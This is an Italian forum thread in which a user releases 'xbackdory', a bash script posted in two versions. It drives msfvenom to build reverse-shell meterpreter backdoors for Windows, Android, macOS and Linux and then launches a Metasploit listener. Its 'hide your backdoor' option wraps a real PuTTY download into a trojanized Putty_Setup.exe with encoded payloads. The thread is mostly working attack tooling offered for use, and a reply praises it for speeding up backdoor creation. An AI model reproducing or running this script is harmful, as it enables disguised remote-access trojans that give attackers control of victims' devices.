Tool xbackdory - Backdoor bash script RELEASE

Stato
Discussione chiusa ad ulteriori risposte.

f3b995

Utente Silver
27 Febbraio 2015
86
13
5
50
Ultima modifica:
Buonasera, ho continuato lo script Xbackdory e ho sistemato un po di cose e aggiunto altre utlity come la possibilità di vedere il proprio ip locale (delle schede di rete installate sul pc) e anche l'ip esterno.




Quindi i requisiti sono:
{

- Kali linux / Parrot OS / Backbox / ditro varie di pentesting / Ubuntu
- metasploit-framework
- postgresql (si, il servizio)
}

Per i permessi dovete dargli solo " chmod +x xbackdory " e siete apposto.
Invece se volete.. ehm.. diciamo installarlo sul pc date questi comandi

sudo cp xbackdory /usr/bin/
cd /usr/bin/
chmod +x xbackdory

chiudete il terminale e riapritelo, ora date sudo xbackdory (non rinominatelo con .sh perchè è brutto)
ed ecco qui il vostro meterpreter creator ;)


Bash:
#!/bin/bash

# XbackDory 3.0.5-2

##### are u root?
clear
if [ $(id -u) -ne 0 ]; then
       echo -e '\E[1;31m'"This script needs root permissions!"; tput sgr0
       exit 1
fi
############################################## START ###############################################
sleep 1
clear
for i in {16..70} {70..16} ; do echo -en "\e[38;5;${i}m#\e[0m" ; done ; echo
echo -e '\E[1;36m'"                   -Creator-  *(#)* meterpreter/reverse_tcp *(#)*  -creator-"; tput sgr0
echo -e '\E[1;35m'"                                      *coded by VeganFeb*                           "; tput sgr0
sleep 1

echo ""
echo              "+-----------------------------+ "
echo -e '\E[1;33m'" What the (s)hell do you want?"; tput sgr0
echo              "+-----------------------------+ "
sleep 0.5
echo -e   '\E[0;31m'"+---------------+"; tput sgr0
sleep 0.1
echo -n             "|(1) Windows (1)|"
echo ""
echo -e   '\E[0;32m'"+---------------+"; tput sgr0
sleep 0.1
echo -n             "|(2) Android (2)|"
echo ""
echo -e   '\E[0;33m'"+---------------+"; tput sgr0
sleep 0.1
echo -n             "|(3) Mac OSX (3)|"
echo ""
echo -e   '\E[0;34m'"+---------------+"; tput sgr0
sleep 0.1
echo -n             "|(4) Unix    (4)|"
echo ""
echo -e   '\E[0;35m'"+---------------+"; tput sgr0
sleep 0.1
echo -n             "|(5) Exit    (5)|"
echo ""
echo -e   '\E[0;36m'"+---------------+"; tput sgr0
echo ""

read answer

# Exit the program
if [ $answer -eq 5 ]; then
   clear
   echo ""
   echo -e '\E[1;37m'"See you next time bro ;)"; tput sgr0
   echo ""
   exit
fi

##### IP network cards
sleep 1
clear
echo -e '\E[0;31m'"+-----------------------------------------------------------------+"; tput sgr0
echo -e '\E[1;37m'" In this page you can see your local IP from wlan0/eth0/wlan1/eth1 "; tput sgr0
echo -e '\E[1;37m'"     Copy your IP in the clipboard and press ENTER to continue     "; tput sgr0
echo -e '\E[0;31m'"+-----------------------------------------------------------------+"; tput sgr0
sleep 0.5
echo ""
#################################### wlan0
t1=$(ifconfig wlan0 | grep -o inet:)
t2='inet:'

if [ "$t1" = "$t2" ]; then
  echo -e '\E[1;32m'"wlan0"; tput sgr0 ; ifconfig wlan0 | grep 'inet:' | awk -F: '{print $2}' | awk '{print $1}'
else
  echo -e '\E[1;31m'"wlan0 down"; tput sgr0
fi

echo ""
##################################### eth0
t1=$(ifconfig eth0 | grep -o inet:)
t2='inet:'

if [ "$t1" = "$t2" ]; then
  echo -e '\E[1;32m'"eth0"; tput sgr0; ifconfig eth0 | grep 'inet:' | awk -F: '{print $2}' | awk '{print $1}'
else
  echo -e '\E[1;31m'"eth0 down"; tput sgr0
fi

echo ""
##################################### wlan1
t1=$(ifconfig wlan1 | grep -o inet:)
t2='inet:'

if [ "$t1" = "$t2" ]; then
  echo -e '\E[1;32m'"wlan1"; tput sgr0; ifconfig wlan1 | grep 'inet:' | awk -F: '{print $2}' | awk '{print $1}'
else
  echo -e '\E[1;31m'"wlan1 down"; tput sgr0
fi

echo ""
##################################### eth1
t1=$(ifconfig eth1 | grep -o inet:)
t2='inet:'

if [ "$t1" = "$t2" ]; then
  echo -e '\E[1;32m'"eth1"; tput sgr0; ifconfig eth1 | grep 'inet:' | awk -F: '{print $2}' | awk '{print $1}'
else
  echo -e '\E[1;31m'"eth1 down"; tput sgr0
fi
echo ""
##### /// IP network card
# external ip
echo -e '\E[1;36m'"* This is your external IP *"; tput sgr0
wget http://ipinfo.io/ip -qO -
echo ""

echo -e -n '\E[1;37m'"Press ENTER to continue..."; tput sgr0
read enter
clear
sleep 0.5

if [ $answer -eq 1 ] ; then
######################################### windows
clear
sleep 1
echo -e '\E[1;31m'"WINDOWS"; tput sgr0
echo ""


echo -n -e '\E[1;33m'"Do you want to hide your backdoor? (y/n)" ; tput sgr0 ;read backdoor
echo ""

####### PUTTY.exe
if [ $backdoor = y ]; then
echo -e '\E[1;32m'your IP: ; tput sgr0
read IP
echo ""
sleep 1


echo "Download the latest version of putty.exe"
wget http://the.earth.li/~sgtatham/putty/0.67/x86/putty.exe
echo -e '\E[1;37m'"Wait for the msfvenom.. " ; tput sgr0
sudo msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp LHOST=$IP -e x86/shikata_ga_nai -i 3 -b "/00" -f exe -o Putty_Setup.exe    
####### // PUTTY.exe
else
####### Normal backdoor
if [ $backdoor = n ]; then
echo ""
echo -e '\E[1;32m'Your IP: ; tput sgr0
read IP
echo ""
echo -e '\E[1;33m'Port:  ; tput sgr0
read Port
echo ""
echo -e '\E[1;34m'Name .exe:  ; tput sgr0
read exe
echo ""
sleep 1
echo -e '\E[1;37m'"Starting msfvenom.. please wait"; tput sgr0   
   sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=$IP LPORT=$Port -f exe > $exe.exe

echo ""
echo -e '\E[1;37m'"Done!"; tput sgr0
fi
fi
############# ask Service postgresql & msfconsole
echo -n -e '\E[1;33m'"Do you want to start postgresql? (y/n) " ; tput sgr0 ; read postgresql

#### Y
if [ $postgresql = y ]; then
   
   echo -e '\E[1;37m'"Okay. Starting service postgresql"; tput sgr0
        sudo service postgresql start
   sleep 1
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
   clear
   echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0    
   sudo msfconsole         

else

if [ $msf = n ]; then
   clear
        echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
        exit
         
fi
fi
else
#### N
if [ $postgresql = n ]; then
echo -e '\E[1;37m'"Okay" ; tput sgr0     
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
   clear
   echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
        sudo msfconsole
         

else

if [ $msf = n ]; then
   clear
   echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
        exit

fi
fi
fi
fi
exit
############## /// ask Service postgresql $ msfconsole


######################################### /// windows

else

if [ $answer -eq 2 ] ; then
######################################### android
clear
sleep 1
echo -e '\E[1;31m'"ANDROID"; tput sgr0
echo -e '\E[1;32m'Your IP: ; tput sgr0
read IP
echo ""
echo -e '\E[1;33m'Port:  ; tput sgr0
read Port
echo ""
echo -e '\E[1;34m'Name .apk:  ; tput sgr0
read apk
echo ""
sleep 1
echo -e '\E[1;37m'"Starting msfvenom.. please wait"; tput sgr0

sudo msfvenom -p android/meterpreter/reverse_tcp --platform android LHOST=$IP LPORT=$Port R > $apk.apk

############# ask Service postgresql & msfconsole
echo -n -e '\E[1;33m'"Do you want to start postgresql? (y/n) " ; tput sgr0 ; read postgresql

#### Y
if [ $postgresql = y ]; then
   
   echo -e '\E[1;37m'"Okay. Starting service postgresql"; tput sgr0
        sudo service postgresql start
   sleep 1
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
   clear
   echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0    
   sudo msfconsole         

else

if [ $msf = n ]; then
   clear
        echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
        exit
         
fi
fi
else
#### N
if [ $postgresql = n ]; then
echo -e '\E[1;37m'"Okay" ; tput sgr0     
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
   clear
   echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
        sudo msfconsole
         

else

if [ $msf = n ]; then
   clear
   echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
        exit

fi
fi
fi
fi
exit
############## /// ask Service postgresql $ msfconsole
######################################### /// android

else

if [ $answer -eq 3 ]; then
######################################### Mac OSX
clear
sleep 1
echo -e '\E[1;31m'"Mac OSX"; tput sgr0
echo -e '\E[1;32m'Your IP: ; tput sgr0
read IP
echo ""
echo -e '\E[1;33m'Port:  ; tput sgr0
read Port
echo ""
echo -e '\E[1;34m'Name .macho:  ; tput sgr0
read name
echo ""
sleep 1
echo -e '\E[1;37m'"Starting msfvenom.. please wait"; tput sgr0

sudo msfvenom -p osx/x86/shell_reverse_tcp LHOST=$IP LPORT=$Port -f macho > $name.macho

############# ask Service postgresql & msfconsole
echo -n -e '\E[1;33m'"Do you want to start postgresql? (y/n) " ; tput sgr0 ; read postgresql

#### Y
if [ $postgresql = y ]; then
   
   echo -e '\E[1;37m'"Okay. Starting service postgresql"; tput sgr0
        sudo service postgresql start
   sleep 1
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
   clear
   echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0    
   sudo msfconsole         

else

if [ $msf = n ]; then
   clear
        echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
        exit
         
fi
fi
else
#### N
if [ $postgresql = n ]; then
echo -e '\E[1;37m'"Okay" ; tput sgr0     
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
   clear
   echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
        sudo msfconsole
         

else

if [ $msf = n ]; then
   clear
   echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
        exit

fi
fi
fi
fi
exit
############## /// ask Service postgresql $ msfconsole
######################################### /// MAC OSX

else

if [ $answer -eq 4 ]; then
######################################### UNIX
clear
sleep 1
echo -e '\E[1;31m'"Unix"; tput sgr0
echo -e '\E[1;32m'Your IP: ; tput sgr0
read IP
echo ""
echo -e '\E[1;33m'Port:  ; tput sgr0
read Port
echo ""
echo -e '\E[1;34m'Name .elf:  ; tput sgr0
read name
echo ""
sleep 1
echo -e '\E[1;37m'"Starting msfvenom.. please wait"; tput sgr0

sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -f elf > $name.elf

############# ask Service postgresql & msfconsole
echo -n -e '\E[1;33m'"Do you want to start postgresql? (y/n) " ; tput sgr0 ; read postgresql

#### Y
if [ $postgresql = y ]; then
   
   echo -e '\E[1;37m'"Okay. Starting service postgresql"; tput sgr0
        sudo service postgresql start
   sleep 1
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
   clear
   echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0    
   sudo msfconsole         

else

if [ $msf = n ]; then
   clear
        echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
        exit
         
fi
fi
else
#### N
if [ $postgresql = n ]; then
echo -e '\E[1;37m'"Okay" ; tput sgr0     
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
   clear
   echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
        sudo msfconsole
         

else

if [ $msf = n ]; then
   clear
   echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
        exit

fi
fi
fi
fi
exit
############## /// ask Service postgresql $ msfconsole
######################################### /// UNIX
fi
fi
fi
fi

for i in {16..70} {70..16} ; do echo -en "\e[38;5;${i}m#\e[0m" ; done ; echo
exit
 
  • Mi piace
Reazioni: ScriptMan
Buonasera

Voglio rilasciare il mio script open source in bash che crea delle backdoor specifiche per windows, android, mac osx e unix (a breve anche altre categorie)
Per i mega cervelloni, QUESTA È UNA UTILITY PER FAR PIÙ VELOCE NEL FAR LE "COSE"!!!

Quindi i requisiti sono:
{
- Kali linux / Parrot OS / Backbox / ditro varie di pentesting / Ubuntu
- metasploit-framework
- postgresql (si, il servizio)
}

..È ancora in fase di sviluppo ma per ora va già bene cosi!
Ho creato altri script utility (come li chiamo io) che mi facilitano molti compiti riguardo all'Hacking e anche a lavori su linux, tipo gestione del governor e pulizia della cache, ram ecc.

Spero vi piaccia,
Per i permessi dovete dargli solo " chmod +x xbackdory " e siete apposto.
Invece se volete.. ehm.. diciamo installarlo sul pc date questi comandi

sudo cp xbackdory /usr/bin/
cd /usr/bin/
chmod +x xbackdory

chiudete il terminale e riapritelo, ora date sudo xbackdory (non rinominatelo con .sh perchè è brutto)
ed ecco qui il vostro meterpreter creator ;)


Bash:
#!/bin/bash

# XbackDory 2.5

##### are u root?
clear
if [ $(id -u) -ne 0 ]; then
       echo -e '\E[1;31m'"This script needs root permissions!"; tput sgr0
       exit 1
fi
############################################## START ###############################################
sleep 1
clear
for i in {16..70} {70..16} ; do echo -en "\e[38;5;${i}m#\e[0m" ; done ; echo
echo -e '\E[1;36m'"                   -Creator-  *(#)* meterpreter/reverse_tcp *(#)*  -Creator-"; tput sgr0
echo -e '\E[1;35m'"                                        *coded by Vegan-f3b*                           "; tput sgr0
sleep 1

echo ""
echo -e '\E[1;33m'"What the (s)hell do you want?"; tput sgr0
echo -e   '\E[0;31m'"+------------+"; tput sgr0
echo -n             "|1) Windows  |"
echo ""
echo -e   '\E[0;32m'"+------------+"; tput sgr0
echo -n             "|2) Android  |"
echo ""
echo -e   '\E[0;33m'"+------------+"; tput sgr0
echo -n             "|3) Mac OSX  |"
echo ""
echo -e   '\E[0;34m'"+------------+"; tput sgr0
echo -n             "|4) Unix     |"
echo ""
echo -e   '\E[0;35m'"+------------+"; tput sgr0
echo -n             "|5) Exit     |"
echo ""
echo -e   '\E[0;36m'"+------------+"; tput sgr0
echo ""
read answer


if [ $answer -eq 1 ] ; then
######################################### windows
echo ""
echo -e '\E[1;31m'"WINDOWS"; tput sgr0
echo ""


echo -n -e '\E[1;37m'"Do you want to hide your backdoor? (y/n)" ; tput sgr0 ;read backdoor

####### PUTTY.exe
if [ $backdoor = y ]; then
echo -e '\E[1;32m'your IP: ; tput sgr0
read IP
echo ""
sleep 1


echo "Download the latest version of putty.exe"
wget http://the.earth.li/~sgtatham/putty/0.67/x86/putty.exe
echo -e '\E[1;37m'"Wait for the msfvenom.. " ; tput sgr0
sudo msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp LHOST=$IP -e x86/shikata_ga_nai -i 3 -b "/00" -f exe -o Putty_Setup.exe    
####### // PUTTY.exe
else
####### Normal backdoor
if [ $backdoor = n ]; then
echo ""
echo -e '\E[1;32m'Your IP: ; tput sgr0
read IP
echo ""
echo -e '\E[1;33m'Port:  ; tput sgr0
read Port
echo ""
echo -e '\E[1;34m'Name .exe:  ; tput sgr0
read exe
echo ""
sleep 1
echo -e '\E[1;37m'"Starting msfvenom.. please wait"; tput sgr0   
    sudo msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=$IP LPORT=$Port -f exe > $exe.exe

echo ""
echo -e '\E[1;37m'"Done!"; tput sgr0
fi
fi
############# ask Service postgresql & msfconsole
echo -n -e '\E[1;33m'"Do you want to start postgresql? (y/n) " ; tput sgr0 ; read postgresql

#### Y
if [ $postgresql = y ]; then
  echo -e '\E[1;37m'"Okay. Starting service postgresql"; tput sgr0
      sudo service postgresql start
    sleep 1
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
  echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
      sudo msfconsole
echo ""
echo "Stopping service postgresql.."
    sudo service postgresql stop          

else

if [ $msf = n ]; then
  echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
      exit
         
fi
fi
else
#### N
if [ $postgresql = n ]; then
  echo -e '\E[1;37m'"Okay" ; tput sgr0
     


echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
  echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
      sudo msfconsole
         

else

if [ $msf = n ]; then
  echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
      exit
     

echo ""
echo "Stopping service postgresql.."
    sudo service postgresql stop

fi
fi
fi
fi
exit
############## /// ask Service postgresql $ msfconsole


######################################### /// windows

else

if [ $answer -eq 2 ] ; then
######################################### android
echo ""
echo -e '\E[1;31m'"ANDROID"; tput sgr0
echo -e '\E[1;32m'Your IP: ; tput sgr0
read IP
echo ""
echo -e '\E[1;33m'Port:  ; tput sgr0
read Port
echo ""
echo -e '\E[1;34m'Name .apk:  ; tput sgr0
read apk
echo ""
sleep 1
echo -e '\E[1;37m'"Starting msfvenom.. please wait"; tput sgr0

sudo msfvenom -p android/meterpreter/reverse_tcp --platform android LHOST=$IP LPORT=$Port R > $apk.apk

############# ask Service postgresql & msfconsole
echo -n -e '\E[1;33m'"Do you want to start postgresql? (y/n) " ; tput sgr0 ; read postgresql

#### Y
if [ $postgresql = y ]; then
  echo -e '\E[1;37m'"Okay. Starting service postgresql"; tput sgr0
      sudo service postgresql start
    sleep 1
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
  echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
      sudo msfconsole
echo ""
echo "Stopping service postgresql.."
    sudo service postgresql stop

else

if [ $msf = n ]; then
  echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
      exit
         
fi
fi
else
#### N
if [ $postgresql = n ]; then
  echo -e '\E[1;37m'"Okay" ; tput sgr0
     


echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
  echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
      sudo msfconsole
         

else

if [ $msf = n ]; then
  echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
      exit
     

echo ""
echo "Stopping service postgresql.."
    sudo service postgresql stop

fi
fi
fi
fi
exit
############## /// ask Service postgresql $ msfconsole
######################################### /// android

else

if [ $answer -eq 3 ]; then
######################################### Mac OSX
echo ""
echo -e '\E[1;31m'"Mac OSX"; tput sgr0
echo -e '\E[1;32m'Your IP: ; tput sgr0
read IP
echo ""
echo -e '\E[1;33m'Port:  ; tput sgr0
read Port
echo ""
echo -e '\E[1;34m'Name .macho:  ; tput sgr0
read name
echo ""
sleep 1
echo -e '\E[1;37m'"Starting msfvenom.. please wait"; tput sgr0

sudo msfvenom -p osx/x86/shell_reverse_tcp LHOST=$IP LPORT=$Port -f macho > $name.macho

############# ask Service postgresql & msfconsole
echo -n -e '\E[1;33m'"Do you want to start postgresql? (y/n) " ; tput sgr0 ; read postgresql

#### Y
if [ $postgresql = y ]; then
  echo -e '\E[1;37m'"Okay. Starting service postgresql"; tput sgr0
      sudo service postgresql start
    sleep 1
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
  echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
      sudo msfconsole
echo ""
echo "Stopping service postgresql.."
    sudo service postgresql stop

else

if [ $msf = n ]; then
  echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
      exit
         
fi
fi
else
#### N
if [ $postgresql = n ]; then
  echo -e '\E[1;37m'"Okay" ; tput sgr0
     


echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
  echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
      sudo msfconsole
         

else

if [ $msf = n ]; then
  echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
      exit
     

echo ""
echo "Stopping service postgresql.."
    sudo service postgresql stop

fi
fi
fi
fi
exit
############## /// ask Service postgresql $ msfconsole
######################################### /// MAC OSX

else

if [ $answer -eq 4 ]; then
######################################### UNIX
echo ""
echo -e '\E[1;31m'"Unix"; tput sgr0
echo -e '\E[1;32m'Your IP: ; tput sgr0
read IP
echo ""
echo -e '\E[1;33m'Port:  ; tput sgr0
read Port
echo ""
echo -e '\E[1;34m'Name .elf:  ; tput sgr0
read name
echo ""
sleep 1
echo -e '\E[1;37m'"Starting msfvenom.. please wait"; tput sgr0

sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=$Port -f elf > $name.elf

############# ask Service postgresql & msfconsole
echo -n -e '\E[1;33m'"Do you want to start postgresql? (y/n) " ; tput sgr0 ; read postgresql

#### Y
if [ $postgresql = y ]; then
  echo -e '\E[1;37m'"Okay. Starting service postgresql"; tput sgr0
      sudo service postgresql start
    sleep 1
echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
  echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
      sudo msfconsole
echo ""
echo "Stopping service postgresql.."
    sudo service postgresql stop
         

else

if [ $msf = n ]; then
  echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
      exit
         
fi
fi
else
#### N
if [ $postgresql = n ]; then
  echo -e '\E[1;37m'"Okay" ; tput sgr0
     


echo ""
echo -n -e '\E[1;33m'"Do you want to start the msfconsole? (y/n) " ; tput sgr0 ; read msf
echo ""

if [ $msf = y ]; then
  echo -e '\E[1;37m'"Okay. Starting the msfconsole.."; tput sgr0
      sudo msfconsole          

else

if [ $msf = n ]; then
  echo -e '\E[1;37m'"Okay, bye" ; tput sgr0
      exit
     

fi
fi
fi
fi
exit
############## /// ask Service postgresql $ msfconsole
######################################### /// UNIX
else
# exit
if [ $answer -eq 5 ]; then
    clear
    sleep 1
    echo ""
    echo -e '\E[1;37m'"Okay.. see you after bro! :)"; tput sgr0
    echo ""   
    exit
#///exit
fi
fi
fi
fi
fi

for i in {16..70} {70..16} ; do echo -en "\e[38;5;${i}m#\e[0m" ; done ; echo
exit
molto semplice ma ottimo per velocizzare la creazione di una backdoor!
 
  • Mi piace
Reazioni: f3b995
Stato
Discussione chiusa ad ulteriori risposte.